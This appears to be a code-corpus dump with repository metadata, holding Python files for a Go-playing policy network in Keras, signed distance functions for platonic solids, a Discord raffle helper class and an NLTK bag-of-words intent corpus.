def batch_eval_state(self, states, moves_lists=None):
"""Given a list of states, evaluates them all at once to make best use of GPU
batching capabilities.
Analogous to [eval_state(s) for s in states]
Returns: a parallel list of move distributions as in eval_state
"""
n_states = len(states)
if n_states == 0:
return []
state_size = states[0].get_size()
if not all([st.get_size() == state_size for st in states]):
raise ValueError("all states must have the same size")
# concatenate together all one-hot encoded states along the 'batch' dimension
nn_input = np.concatenate([self.preprocessor.state_to_tensor(s) for s in states], axis=0)
# pass all input through the network at once (backend makes use of
# batches if len(states) is large)
network_output = self.forward(nn_input)
# default move lists to all legal moves
moves_lists = moves_lists or [st.get_legal_moves() for st in states]
results = [None] * n_states
for i in range(n_states):
results[i] = self._select_moves_and_normalize(network_output[i], moves_lists[i],
state_size)
return results
def eval_state(self, state, moves=None):
"""Given a GameState object, returns a list of (action, probability) pairs
according to the network outputs
If a list of moves is specified, only those moves are kept in the distribution
"""
tensor = self.preprocessor.state_to_tensor(state)
# run the tensor through the network
network_output = self.forward(tensor)
moves = moves or state.get_legal_moves()
return self._select_moves_and_normalize(network_output[0], moves, state.get_size())
@staticmethod
def create_network(**kwargs):
"""construct a convolutional neural network.
Keword Arguments:
- input_dim: depth of features to be processed by first layer (no default)
- board: width of the go board to be processed (default 19)
- filters_per_layer: number of filters used on every layer (default 128)
- filters_per_layer_K: (where K is between 1 and <layers>) number of filters
used on layer K (default #filters_per_layer)
- layers: number of convolutional steps (default 12)
- filter_width_K: (where K is between 1 and <layers>) width of filter on
layer K (default 3 except 1st layer which defaults to 5).
Must be odd.
"""
defaults = {
"board": 19,
"filters_per_layer": 128,
"layers": 12,
"filter_width_1": 5
}
# copy defaults, but override with anything in kwargs
params = defaults
params.update(kwargs)
# create the network:
# a series of zero-paddings followed by convolutions
# such that the output dimensions are also board x board
network = Sequential()
# create first layer
network.add(Conv2D(
input_shape=(params["input_dim"], params["board"], params["board"]),
filters=params.get("filters_per_layer_1", params["filters_per_layer"]),
kernel_size=(params["filter_width_1"], params["filter_width_1"]),
kernel_initializer='uniform',
activation='relu',
padding='same',
kernel_constraint=None,
activity_regularizer=None,
trainable=True,
strides=[1, 1],
use_bias=True,
bias_regularizer=None,
bias_constraint=None,
data_format="channels_first",
kernel_regularizer=None))
# create all other layers
for i in range(2, params["layers"] + 1):
# use filter_width_K if it is there, otherwise use 3
filter_key = "filter_width_%d" % i
filter_width = params.get(filter_key, 3)
# use filters_per_layer_K if it is there, otherwise use default value
filter_count_key = "filters_per_layer_%d" % i
filter_nb = params.get(filter_count_key, params["filters_per_layer"])
network.add(Conv2D(
filters=filter_nb,
kernel_size=(filter_width, filter_width),
kernel_initializer='uniform',
activation='relu',
padding='same',
kernel_constraint=None,
activity_regularizer=None,
trainable=True,
strides=[1, 1],
use_bias=True,
bias_regularizer=None,
bias_constraint=None,
data_format="channels_first",
kernel_regularizer=None))
# the last layer maps each <filters_per_layer> feature to a number
network.add(Conv2D(
filters=1,
kernel_size=(1, 1),
kernel_initializer='uniform',
padding='same',
kernel_constraint=None,
activity_regularizer=None,
trainable=True,
strides=[1, 1],
use_bias=True,
bias_regularizer=None,
bias_constraint=None,
data_format="channels_first",
kernel_regularizer=None))
# reshape output to be board x board
network.add(Flatten())
# add a bias to each board location
network.add(Bias())
# softmax makes it into a probability distribution
network.add(Activation('softmax'))
return network
@neuralnet
class ResnetPolicy(CNNPolicy):
"""Residual network architecture as per He at al. 2015
"""
@staticmethod
def create_network(**kwargs):
"""construct a convolutional neural network with Resnet-style skip connections.
Arguments are the same as with the default CNNPolicy network, except the default
number of layers is 20 plus a new n_skip parameter
Keword Arguments:
- input_dim: depth of features to be processed by first layer (no default)
- board: width of the go board to be processed (default 19)
- filters_per_layer: number of filters used on every layer (default 128)
- layers: number of convolutional steps (default 20)
- filter_width_K: (where K is between 1 and <layers>) width of filter on
layer K (default 3 except 1st layer which defaults to 5).
Must be odd.
- n_skip_K: (where K is as in filter_width_K) number of convolutional
layers to skip with the linear path starting at K. Only valid
at K >= 1. (Each layer defaults to 1)
Note that n_skip_1=s means that the next valid value of n_skip_* is 3
A diagram may help explain (numbers indicate layer):
1 2 3 4 5 6
I--C--B--R--C--B--R--C--M--B--R--C--B--R--C--B--R--C--M ... M --R--F--O
\__________________/ \___________________________/ \ ... /
[n_skip_1 = 2] [n_skip_3 = 3]
I - input
B - BatchNormalization
R - ReLU
C - Conv2D
F - Flatten
O - output
M - merge
The input is always passed through a Conv2D layer, the output of which
layer is counted as '1'. Each subsequent [R -- C] block is counted as
one 'layer'. The 'merge' layer isn't counted; hence if n_skip_1 is 2,
the next valid skip parameter is n_skip_3, which will start at the
output of the merge
"""
defaults = {
"board": 19,
"filters_per_layer": 128,
"layers": 20,
"filter_width_1": 5
}
# copy defaults, but override with anything in kwargs
params = defaults
params.update(kwargs)
# create the network using Keras' functional API,
# since this isn't 'Sequential'
model_input = Input(shape=(params["input_dim"], params["board"], params["board"]))
# create first layer
convolution_path = Conv2D(
input_shape=(),
filters=params["filters_per_layer"],
kernel_size=(params["filter_width_1"], params["filter_width_1"]),
kernel_initializer='uniform',
activation='linear', # relu activations done inside resnet modules
padding='same',
kernel_constraint=None,
activity_regularizer=None,
trainable=True,
strides=[1, 1],
use_bias=True,
bias_regularizer=None,
bias_constraint=None,
data_format="channels_first",
kernel_regularizer=None)(model_input)
def add_resnet_unit(path, K, **params):
"""Add a resnet unit to path starting at layer 'K',
adding as many (ReLU + Conv2D) modules as specified by n_skip_K
Returns new path and next layer index, i.e. K + n_skip_K, in a tuple
"""
# loosely based on https://github.com/keunwoochoi/residual_block_keras
# see also # keras docs here:
# http://keras.io/getting-started/functional-api-guide/#all-models-are-callable-just-like-layers
block_input = path
# use n_skip_K if it is there, default to 1
skip_key = "n_skip_%d" % K
n_skip = params.get(skip_key, 1)
for i in range(n_skip):
layer = K + i
# add BatchNorm
path = BatchNormalization()(path)
# add ReLU
path = Activation('relu')(path)
# use filter_width_K if it is there, otherwise use 3
filter_key = "filter_width_%d" % layer
filter_width = params.get(filter_key, 3)
# add Conv2D
path = Conv2D(
filters=params["filters_per_layer"],
kernel_size=(filter_width, filter_width),
kernel_initializer='uniform',
activation='linear',
padding='same',
kernel_constraint=None,
activity_regularizer=None,
trainable=True,
strides=[1, 1],
use_bias=True,
bias_regularizer=None,
bias_constraint=None,
data_format="channels_first",
kernel_regularizer=None)(path)
# Merge 'input layer' with the path
path = add([block_input, path])
return path, K + n_skip
# create all other layers
layer = 1
while layer < params['layers']:
convolution_path, layer = add_resnet_unit(convolution_path, layer, **params)
if layer > params['layers']:
print(("Due to skipping, ended with {} layers instead of {}"
.format(layer, params['layers'])))
# since each layer's activation was linear, need one more ReLu
convolution_path = Activation('relu')(convolution_path)
# the last layer maps each <filters_per_layer> featuer to a number
convolution_path = Conv2D(
filters=1,
kernel_size=(1, 1),
kernel_initializer='uniform',
name="policy_conv_last",
padding='same',
activation="linear",
kernel_constraint=None,
activity_regularizer=None,
trainable=True,
strides=[1, 1],
use_bias=True,
bias_regularizer=None,
bias_constraint=None,
data_format="channels_first",
kernel_regularizer=None)(convolution_path)
# flatten output
network_output = Flatten()(convolution_path)
# add a bias to each board location
network_output = Bias()(network_output)
# softmax makes it into a probability distribution
network_output = Activation('softmax')(network_output)
return Model(inputs=[model_input], outputs=[network_output])
| 41.389571 | 108 | 0.580523 | 1,592 | 13,493 | 4.734296 | 0.198492 | 0.02773 | 0.029853 | 0.02229 | 0.44328 | 0.42298 | 0.412366 | 0.385963 | 0.338729 | 0.326522 | 0 | 0.012681 | 0.339583 | 13,493 | 325 | 109 | 41.516923 | 0.833128 | 0.364782 | 0 | 0.565217 | 0 | 0 | 0.080643 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.032609 | false | 0 | 0.038043 | 0 | 0.125 | 0.005435 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
fa09481c8f443c2c7a46f58d6ac6aedc63e011ea | 4,952 | py | Python | src/compas_vol/primitives/platonic.py | dbt-ethz/compas_vol | d8faa22b4b782896837eac0fa10eefb9b2d7f928 | [
"MIT"
] | 8 | 2020-02-13T11:51:03.000Z | 2022-01-13T10:27:47.000Z | src/compas_vol/primitives/platonic.py | dbt-ethz/compas_vol | d8faa22b4b782896837eac0fa10eefb9b2d7f928 | [
"MIT"
] | 5 | 2019-12-04T19:48:40.000Z | 2021-08-23T09:48:48.000Z | src/compas_vol/primitives/platonic.py | dbt-ethz/compas_vol | d8faa22b4b782896837eac0fa10eefb9b2d7f928 | [
"MIT"
] | 6 | 2020-02-12T18:19:23.000Z | 2021-12-16T11:00:32.000Z | from compas.geometry import Point, Vector, Frame
from compas.geometry import matrix_from_frame
from compas.geometry import matrix_inverse
from math import sqrt, tan, pi
class PlatonicSolid(object):
"""A platonic solid, defined by radius and type.
Parameters
----------
radius : float
The radius of the solid.
type : int
The type of solid (tetrahedron, octahedron, dodecahedron, isosahedron)
Examples
--------
>>> ...
References
----------
adapted from SDF library by Michael Fogleman [1]_
..[1] https://github.com/fogleman/sdf/blob/main/sdf/d3.py#L283
"""
def __init__(self, radius, type=0, frame=None):
self.radius = radius
self.type = type
self.frame = frame or Frame.worldXY()
self.inversetransform = matrix_inverse(matrix_from_frame(self.frame))
self.sqrt3 = sqrt(3)
self.tan30 = tan(pi/6)
def get_distance(self, point):
if not isinstance(point, Point):
point = Point(*point)
point.transform(self.inversetransform)
x, y, z = point
# Tetrahedron
if self.type == 0:
return (max(abs(x + y) - z, abs(x - y) + z) - self.radius) / self.sqrt3
# Octahedron
elif self.type == 1:
s = abs(x) + abs(y) + abs(z)
return (s - self.radius) * self.tan30
# Dodecahedron
elif self.type == 2:
v = Vector((1+sqrt(5))/2, 1, 0)
v.unitize()
px = abs(x / self.radius)
py = abs(y / self.radius)
pz = abs(z / self.radius)
p = Vector(px, py, pz)
a = p.dot(v)
b = p.dot(Vector(v.z, v.x, v.y))
c = p.dot(Vector(v.y, v.z, v.x))
q = (max(max(a, b), c) - v.x) * self.radius
return q
# Icosahedron
elif self.type == 3:
r = self.radius * 0.8506507174597755
v = Vector((sqrt(5) + 3)/2, 1, 0)
v.unitize()
w = sqrt(3)/3
px = abs(x / r)
py = abs(y / r)
pz = abs(z / r)
p = Vector(px, py, pz)
a = p.dot(v)
b = p.dot(Vector(v.z, v.x, v.y))
c = p.dot(Vector(v.y, v.z, v.x))
d = p.dot([w,w,w]) - v.x
q = max(max(max(a, b), c) - v.x, d) * r
return q
else:
return 0
def get_distance_numpy(self, x, y, z):
import numpy as np
p = np.array([x, y, z, 1], dtype=object)
xt, yt, zt, _ = np.dot(self.inversetransform, p)
if self.type == 0:
return (np.maximum(np.abs(xt + yt) - zt, np.abs(xt - yt) + zt) - self.radius) / self.sqrt3
elif self.type == 1:
return ((np.abs(xt) + np.abs(yt) + np.abs(zt)) - self.radius) * self.tan30
elif self.type == 2:
v = np.array([(1 + np.sqrt(5)/2, 1, 0)])
v = np.reshape(np.tile(v / np.linalg.norm(v), xt.size), (*xt.shape, 3))
p = np.empty((*xt.shape, 3))
p[:,:,:,0], p[:,:,:,1], p[:,:,:,2] = np.abs(xt/self.radius), np.abs(yt/self.radius), np.abs(zt/self.radius)
return (np.maximum(np.maximum(np.sum(p * v, axis=3), np.sum(p * np.roll(v, 1, axis=3), axis=3)),
np.sum(p * np.roll(v, 2, axis=3), axis=3)) - v[:,:,:,0]) * self.radius
elif self.type == 3:
r = self.radius * 0.8506507174597755
v = np.array([(sqrt(5) + 3)/2, 1, 0])
v = np.reshape(np.tile(v / np.linalg.norm(v), xt.size), (*xt.shape, 3))
w = np.full((*xt.shape,3), np.sqrt(3)/3)
p = np.empty((*xt.shape, 3))
p[:,:,:,0], p[:,:,:,1], p[:,:,:,2] = np.abs(xt/r), np.abs(yt/r), np.abs(zt/r)
return np.maximum(np.maximum(np.maximum(np.sum(p * v, axis=3), np.sum(p * np.roll(v, 1, axis=3), axis=3)),
np.sum(p * np.roll(v, 2, axis=3), axis=3)) - v[:,:,:,0], np.sum(p * w, axis=3) - v[:,:,:,0]) * r
else:
return np.zeros((*xt.shape,))
if __name__=="__main__":
import matplotlib.pyplot as plt
import numpy as np
import time
p = PlatonicSolid(10.0, 0, frame=Frame((1, 2, 3), (1, 0.3, 0.1), (-0.4, 1, 0.3)))
x, y, z = np.ogrid[-30:30:60j, -30:30:60j, -30:30:60j]
start = time.time()
d = p.get_distance_numpy(x, y, z)
end = time.time()
print(end-start)
#m = np.tanh(d[:, :, 30].T)
m = d[:, :, 30].T
#plt.imshow(m, cmap='Greys', interpolation='nearest')
plt.imshow(m)
plt.colorbar()
plt.axis('equal')
plt.show()
# p = PlatonicSolid(10.0, 3)
for y in range(-15, 15):
s = ''
for x in range(-30, 30):
d = p.get_distance((x * 0.5, -y, 0))
if d < 0:
s += 'x'
else:
s += '.'
print(s) | 33.234899 | 119 | 0.476171 | 741 | 4,952 | 3.147099 | 0.190283 | 0.068611 | 0.009005 | 0.006861 | 0.358491 | 0.286021 | 0.23199 | 0.215695 | 0.215695 | 0.215695 | 0 | 0.052179 | 0.342084 | 4,952 | 149 | 120 | 33.234899 | 0.663597 | 0.1042 | 0 | 0.306931 | 0 | 0 | 0.003434 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.029703 | false | 0 | 0.079208 | 0 | 0.217822 | 0.019802 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
fa0b758e79ae5904caff2deec173d14f3c451143 | 911 | py | Python | raffle/utils/safety.py | OofChair/KreusadaCogs | ed35260830731bf9bf87333c07ae759c59eee509 | [
"MIT"
] | null | null | null | raffle/utils/safety.py | OofChair/KreusadaCogs | ed35260830731bf9bf87333c07ae759c59eee509 | [
"MIT"
] | null | null | null | raffle/utils/safety.py | OofChair/KreusadaCogs | ed35260830731bf9bf87333c07ae759c59eee509 | [
"MIT"
] | null | null | null | from typing import Literal
import discord
from .exceptions import InvalidArgument
from .formatting import curl
class RaffleSafeMember(object):
"""Used for formatting `discord.Member` attributes safely."""
def __init__(self, member: discord.Member, obj: Literal["winner", "user"]):
self.name = member.name
self.mention = member.mention
self.id = member.id
self.display_name = member.display_name
self.discriminator = member.discriminator
self.name_and_discriminator = str(member)
self.obj = obj
def __str__(self):
return self.name
def __getattr__(self, attr):
curled = curl(f"{self.obj}.{attr}")
quote = lambda x: f'"{x}"'
exc = "{} is not valid! {} has no attribute {}.".format(
curl(f"{self.obj}.{attr}"), self.obj.capitalize(), quote(attr)
)
raise InvalidArgument(exc)
| 28.46875 | 79 | 0.63337 | 107 | 911 | 5.242991 | 0.448598 | 0.049911 | 0.032086 | 0.042781 | 0.057041 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.243688 | 911 | 31 | 80 | 29.387097 | 0.814224 | 0.060373 | 0 | 0 | 0 | 0 | 0.104706 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.136364 | false | 0 | 0.181818 | 0.045455 | 0.409091 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
fa0c05429cdb05791acfc025e965a83e86abb9ec | 4,193 | py | Python | dsbot/corpus/bag_words.py | jefrysastre/dsbot | 5afbfc34b2846f13d118df70160513935331983d | [
"MIT"
] | null | null | null | dsbot/corpus/bag_words.py | jefrysastre/dsbot | 5afbfc34b2846f13d118df70160513935331983d | [
"MIT"
] | null | null | null | dsbot/corpus/bag_words.py | jefrysastre/dsbot | 5afbfc34b2846f13d118df70160513935331983d | [
"MIT"
] | null | null | null |
import pickle
import nltk
import re
import numpy as np
from string import punctuation
# English
from nltk.stem.lancaster import LancasterStemmer
from nltk.stem.rslp import RSLPStemmer
class BagOfWordsCorpus:
def __init__(self, save_path, commands, verbose, force_training=False):
self.verbose = verbose
self.save_path = save_path
# English
# self.stemmer = LancasterStemmer()
# Portuguese
self.stemmer = RSLPStemmer()
self.stopwords = set(nltk.corpus.stopwords.words('portuguese') + list(punctuation))
self.commands = commands
if force_training:
self.load_corpus()
else:
try:
with open(save_path, "rb") as f:
self.words, self.labels, self.training, self.output = pickle.load(f)
except:
self.load_corpus()
def load_corpus(self):
words = []
labels = []
docs_x = []
docs_y = []
# for intent in data["intents"]:
for key, command in self.commands.items():
for pattern in command.patterns:
wrds = nltk.word_tokenize(pattern)
wrds = [word for word in wrds if word not in self.stopwords]
wrds = [self.stemmer.stem(w.lower()) for w in wrds]
words.extend(wrds)
docs_x.append(wrds)
docs_y.append(command.tag)
if command.tag not in labels:
labels.append(command.tag)
words = sorted(list(set(words)))
labels = sorted(labels)
training = []
output = []
out_empty = [0 for _ in range(len(labels))]
for x, wrds in enumerate(docs_x):
bag = []
for w in words:
if w in wrds:
bag.append(1)
else:
bag.append(0)
output_row = out_empty[:]
output_row[labels.index(docs_y[x])] = 1
training.append(bag)
output.append(output_row)
training = np.array(training)
output = np.array(output)
self.words = words
self.labels = labels
self.training = training
self.output = output
with open("data/data.pickle", "wb") as f:
pickle.dump((words, labels, training, output), f)
def encode(self, sentence):
bag = [0 for _ in range(len(self.words))]
wrds = nltk.word_tokenize(sentence)
wrds = [word for word in wrds if word not in self.stopwords]
wrds = [self.stemmer.stem(w.lower()) for w in wrds]
corrected_input = wrds
# corrent user input spelling caso seja entrada digitada
# corrected_input = []
# for userinput_word in s_words:
# # spell checking
# # userinput_word = reduce_lengthening(userinput_word)
# correct_word = spelling.correction(userinput_word)
# corrected_input.append(correct_word)
if self.verbose:
print("Mensagem do usuario corregida para: {0}".format(corrected_input))
for se in wrds:
for i, w in enumerate(self.words):
if w == se:
bag[i] = 1
return np.array(bag)
def reduce_lengthening(self, word):
pattern = re.compile(r"(.)\1{2,}")
return pattern.sub(r"\1\1", word)
def add(self, sentence, tag):
try:
# read the dataset
with open(self.save_path, "rb") as f:
self.labels, self.training, self.output = pickle.load(f)
x = self.encode([sentence])
# find the phrase in the dataset
if x in self.training:
return
y = [0 for _ in range(len(self.labels))]
y[self.labels.index(tag)] = 1
self.training.append(x)
self.output.append(y)
# add the current phrase to the dataset
with open(self.save_path, "wb") as f:
pickle.dump((self.labels, self.training, self.output), f)
except Exception as e:
print(e) | 29.118056 | 91 | 0.544717 | 492 | 4,193 | 4.552846 | 0.254065 | 0.021429 | 0.021429 | 0.029464 | 0.196429 | 0.176786 | 0.136607 | 0.109821 | 0.109821 | 0.071429 | 0 | 0.004826 | 0.357501 | 4,193 | 144 | 92 | 29.118056 | 0.826652 | 0.108991 | 0 | 0.108696 | 0 | 0 | 0.023131 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.054348 | false | 0 | 0.076087 | 0 | 0.173913 | 0.021739 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |